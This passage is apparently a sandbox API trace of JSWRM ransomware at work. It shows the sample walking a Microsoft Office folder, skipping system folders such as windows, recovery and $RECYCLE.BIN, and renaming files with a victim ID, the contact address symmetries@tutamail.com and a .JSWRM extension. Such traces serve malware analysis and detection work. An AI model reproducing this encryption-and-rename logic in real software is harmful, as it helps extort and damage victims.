lpDistanceToMoveHigh=0x0) returned 0x0 [0101.302] WriteFile (in: hFile=0x45c, lpBuffer=0x2365d8*, nNumberOfBytesToWrite=0xb0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x2365d8*, lpNumberOfBytesWritten=0x345ec00*=0xb0, lpOverlapped=0x0) returned 1 [0101.302] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2365d8 | out: hHeap=0x1e0000) returned 1 [0101.302] CloseHandle (hObject=0x45c) returned 1 [0101.303] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0101.303] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0101.303] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0101.303] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0101.303] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0101.303] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0101.303] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0101.303] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0101.303] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0101.303] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0101.303] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0101.303] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247d70 [0101.303] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0101.303] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0101.303] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Flattener\\Flattener.exe.config" (normalized: "c:\\program files\\microsoft office\\root\\flattener\\flattener.exe.config"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Flattener\\Flattener.exe.config.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\flattener\\flattener.exe.config.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0101.304] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247d70 | out: hHeap=0x1e0000) returned 1 [0101.304] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0101.304] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0101.304] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0101.304] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0101.304] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32ff86b0, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x32ff86b0, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x32ff86b0, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0101.304] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0101.304] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0101.304] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0101.304] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0101.304] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0101.304] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0101.305] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0101.305] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0101.305] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0101.305] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0101.305] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0101.305] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0101.305] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0101.305] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2410d8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0101.305] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0101.305] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0101.305] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0101.305] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0101.305] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240f48, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0101.305] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0101.305] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0101.305] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0101.305] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0101.305] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0101.305] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x6e5cc4e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6e5cc4e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6e5cc4e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x178d8, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="Microsoft.AppV.Eventing.dll", cAlternateFileName="MI9EC4~1.DLL")) returned 1 [0101.305] lstrcmpiW (lpString1="Microsoft.AppV.Eventing.dll", lpString2=".") returned 1 [0101.305] lstrcmpiW (lpString1="Microsoft.AppV.Eventing.dll", lpString2="..") returned 1 [0101.305] lstrcmpiW (lpString1="Microsoft.AppV.Eventing.dll", lpString2="...") returned 1 [0101.305] lstrcmpiW (lpString1="Microsoft.AppV.Eventing.dll", lpString2="windows") returned -1 [0101.305] lstrcmpiW (lpString1="Microsoft.AppV.Eventing.dll", lpString2="recovery") returned -1 [0101.305] lstrcmpiW (lpString1="Microsoft.AppV.Eventing.dll", lpString2="perflogs") returned -1 [0101.305] lstrcmpiW (lpString1="Microsoft.AppV.Eventing.dll", lpString2="documents and settings") returned 1 [0101.305] lstrcmpiW (lpString1="Microsoft.AppV.Eventing.dll", lpString2="$RECYCLE.BIN") returned 1 [0101.305] lstrcmpiW (lpString1="Microsoft.AppV.Eventing.dll", lpString2="system volume information") returned -1 [0101.305] lstrcmpiW (lpString1="Microsoft.AppV.Eventing.dll", lpString2="msocache") returned -1 [0101.305] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0101.305] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AppV.Eventing.dll", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0101.305] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0101.305] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AppV.Eventing.dll", cchWideChar=27, lpMultiByteStr=0x240ef8, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AppV.Eventing.dll", lpUsedDefaultChar=0x0) returned 27 [0101.306] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0101.306] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d578 [0101.306] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AppV.Eventing.dll", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0101.306] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0101.306] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AppV.Eventing.dll", cchWideChar=27, lpMultiByteStr=0x2410d8, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AppV.Eventing.dll", lpUsedDefaultChar=0x0) returned 27 [0101.306] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d578 | out: hHeap=0x1e0000) returned 1 [0101.306] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0101.306] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0101.306] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0101.306] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0101.306] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfa6d5947, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfa6d5947, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfa82ce6a, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xc0d8, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="Microsoft.AppV.Modernizer.Common.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0101.306] lstrcmpiW (lpString1="Microsoft.AppV.Modernizer.Common.dll", lpString2=".") returned 1 [0101.306] lstrcmpiW (lpString1="Microsoft.AppV.Modernizer.Common.dll", lpString2="..") returned 1 [0101.306] lstrcmpiW (lpString1="Microsoft.AppV.Modernizer.Common.dll", lpString2="...") returned 1 [0101.306] lstrcmpiW (lpString1="Microsoft.AppV.Modernizer.Common.dll", lpString2="windows") returned -1 [0101.306] lstrcmpiW (lpString1="Microsoft.AppV.Modernizer.Common.dll", lpString2="recovery") returned -1 [0101.306] lstrcmpiW (lpString1="Microsoft.AppV.Modernizer.Common.dll", lpString2="perflogs") returned -1 [0101.306] lstrcmpiW (lpString1="Microsoft.AppV.Modernizer.Common.dll", lpString2="documents and settings") returned 1 [0101.306] lstrcmpiW (lpString1="Microsoft.AppV.Modernizer.Common.dll", lpString2="$RECYCLE.BIN") returned 1 [0101.306] lstrcmpiW (lpString1="Microsoft.AppV.Modernizer.Common.dll", lpString2="system volume information") returned -1 [0101.306] lstrcmpiW (lpString1="Microsoft.AppV.Modernizer.Common.dll", lpString2="msocache") returned -1 [0101.306] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0101.306] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AppV.Modernizer.Common.dll", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0101.306] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0101.306] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AppV.Modernizer.Common.dll", cchWideChar=36, lpMultiByteStr=0x22d260, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AppV.Modernizer.Common.dll", lpUsedDefaultChar=0x0) returned 36 [0101.306] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0101.306] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0101.306] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AppV.Modernizer.Common.dll", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0101.306] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0101.306] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AppV.Modernizer.Common.dll", cchWideChar=36, lpMultiByteStr=0x22d0a0, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AppV.Modernizer.Common.dll", lpUsedDefaultChar=0x0) returned 36 [0101.306] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0101.306] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2360d0 [0101.306] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0101.306] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0101.306] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0101.307] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x7fd9ab, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x7fd9ab, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x7fd9ab, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x58cd8, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="Microsoft.AppV.Modernizer.CSharp.dll", cAlternateFileName="MICROS~4.DLL")) returned 1 [0101.307] lstrcmpiW (lpString1="Microsoft.AppV.Modernizer.CSharp.dll", lpString2=".") returned 1 [0101.307] lstrcmpiW (lpString1="Microsoft.AppV.Modernizer.CSharp.dll", lpString2="..") returned 1 [0101.307] lstrcmpiW (lpString1="Microsoft.AppV.Modernizer.CSharp.dll", lpString2="...") returned 1 [0101.307] lstrcmpiW (lpString1="Microsoft.AppV.Modernizer.CSharp.dll", lpString2="windows") returned -1 [0101.307] lstrcmpiW (lpString1="Microsoft.AppV.Modernizer.CSharp.dll", lpString2="recovery") returned -1 [0101.307] lstrcmpiW (lpString1="Microsoft.AppV.Modernizer.CSharp.dll", lpString2="perflogs") returned -1 [0101.307] lstrcmpiW (lpString1="Microsoft.AppV.Modernizer.CSharp.dll", lpString2="documents and settings") returned 1 [0101.307] lstrcmpiW (lpString1="Microsoft.AppV.Modernizer.CSharp.dll", lpString2="$RECYCLE.BIN") returned 1 [0101.307] lstrcmpiW (lpString1="Microsoft.AppV.Modernizer.CSharp.dll", lpString2="system volume information") returned -1 [0101.307] lstrcmpiW (lpString1="Microsoft.AppV.Modernizer.CSharp.dll", lpString2="msocache") returned -1 [0101.307] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c220 [0101.307] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AppV.Modernizer.CSharp.dll", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0101.307] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0101.307] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AppV.Modernizer.CSharp.dll", cchWideChar=36, lpMultiByteStr=0x22cdc8, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AppV.Modernizer.CSharp.dll", lpUsedDefaultChar=0x0) returned 36 [0101.307] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c220 | out: hHeap=0x1e0000) returned 1 [0101.307] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0101.307] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AppV.Modernizer.CSharp.dll", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0101.307] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0101.307] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AppV.Modernizer.CSharp.dll", cchWideChar=36, lpMultiByteStr=0x22ce70, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AppV.Modernizer.CSharp.dll", lpUsedDefaultChar=0x0) returned 36 [0101.307] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0101.307] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236a28 [0101.307] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2360d0 | out: hHeap=0x1e0000) returned 1 [0101.307] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0101.307] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0101.307] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x9862502, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x9862502, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x9888767, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x6924d8, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="Microsoft.AppV.Modernizer.ManagedCpp.dll", cAlternateFileName="MI5FC8~1.DLL")) returned 1 [0101.307] lstrcmpiW (lpString1="Microsoft.AppV.Modernizer.ManagedCpp.dll", lpString2=".") returned 1 [0101.307] lstrcmpiW (lpString1="Microsoft.AppV.Modernizer.ManagedCpp.dll", lpString2="..") returned 1 [0101.307] lstrcmpiW (lpString1="Microsoft.AppV.Modernizer.ManagedCpp.dll", lpString2="...") returned 1 [0101.307] lstrcmpiW (lpString1="Microsoft.AppV.Modernizer.ManagedCpp.dll", lpString2="windows") returned -1 [0101.307] lstrcmpiW (lpString1="Microsoft.AppV.Modernizer.ManagedCpp.dll", lpString2="recovery") returned -1 [0101.307] lstrcmpiW (lpString1="Microsoft.AppV.Modernizer.ManagedCpp.dll", lpString2="perflogs") returned -1 [0101.307] lstrcmpiW (lpString1="Microsoft.AppV.Modernizer.ManagedCpp.dll", lpString2="documents and settings") returned 1 [0101.307] lstrcmpiW (lpString1="Microsoft.AppV.Modernizer.ManagedCpp.dll", lpString2="$RECYCLE.BIN") returned 1 [0101.308] lstrcmpiW (lpString1="Microsoft.AppV.Modernizer.ManagedCpp.dll", lpString2="system volume information") returned -1 [0101.308] lstrcmpiW (lpString1="Microsoft.AppV.Modernizer.ManagedCpp.dll", lpString2="msocache") returned -1 [0101.308] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232c18 [0101.308] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AppV.Modernizer.ManagedCpp.dll", cchWideChar=40, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 40 [0101.308] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0101.308] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AppV.Modernizer.ManagedCpp.dll", cchWideChar=40, lpMultiByteStr=0x22d260, cbMultiByte=40, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AppV.Modernizer.ManagedCpp.dll", lpUsedDefaultChar=0x0) returned 40 [0101.308] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232c18 | out: hHeap=0x1e0000) returned 1 [0101.308] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ce8 [0101.308] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AppV.Modernizer.ManagedCpp.dll", cchWideChar=40, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 40 [0101.308] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0101.308] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AppV.Modernizer.ManagedCpp.dll", cchWideChar=40, lpMultiByteStr=0x22d0a0, cbMultiByte=40, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AppV.Modernizer.ManagedCpp.dll", lpUsedDefaultChar=0x0) returned 40 [0101.308] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ce8 | out: hHeap=0x1e0000) returned 1 [0101.308] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b6a0 [0101.308] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236a28 | out: hHeap=0x1e0000) returned 1 [0101.308] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0101.308] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0101.308] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf4266542, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf4266542, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf42b29f3, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x11e60, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="Microsoft.Tools.BinaryStore.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0101.308] lstrcmpiW (lpString1="Microsoft.Tools.BinaryStore.dll", lpString2=".") returned 1 [0101.308] lstrcmpiW (lpString1="Microsoft.Tools.BinaryStore.dll", lpString2="..") returned 1 [0101.308] lstrcmpiW (lpString1="Microsoft.Tools.BinaryStore.dll", lpString2="...") returned 1 [0101.308] lstrcmpiW (lpString1="Microsoft.Tools.BinaryStore.dll", lpString2="windows") returned -1 [0101.308] lstrcmpiW (lpString1="Microsoft.Tools.BinaryStore.dll", lpString2="recovery") returned -1 [0101.308] lstrcmpiW (lpString1="Microsoft.Tools.BinaryStore.dll", lpString2="perflogs") returned -1 [0101.308] lstrcmpiW (lpString1="Microsoft.Tools.BinaryStore.dll", lpString2="documents and settings") returned 1 [0101.308] lstrcmpiW (lpString1="Microsoft.Tools.BinaryStore.dll", lpString2="$RECYCLE.BIN") returned 1 [0101.308] lstrcmpiW (lpString1="Microsoft.Tools.BinaryStore.dll", lpString2="system volume information") returned -1 [0101.308] lstrcmpiW (lpString1="Microsoft.Tools.BinaryStore.dll", lpString2="msocache") returned -1 [0101.308] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0101.308] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Tools.BinaryStore.dll", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0101.308] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0101.308] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Tools.BinaryStore.dll", cchWideChar=31, lpMultiByteStr=0x240f48, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Tools.BinaryStore.dll", lpUsedDefaultChar=0x0) returned 31 [0101.308] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0101.308] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0101.308] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Tools.BinaryStore.dll", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0101.309] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0101.309] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Tools.BinaryStore.dll", cchWideChar=31, lpMultiByteStr=0x2410d8, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 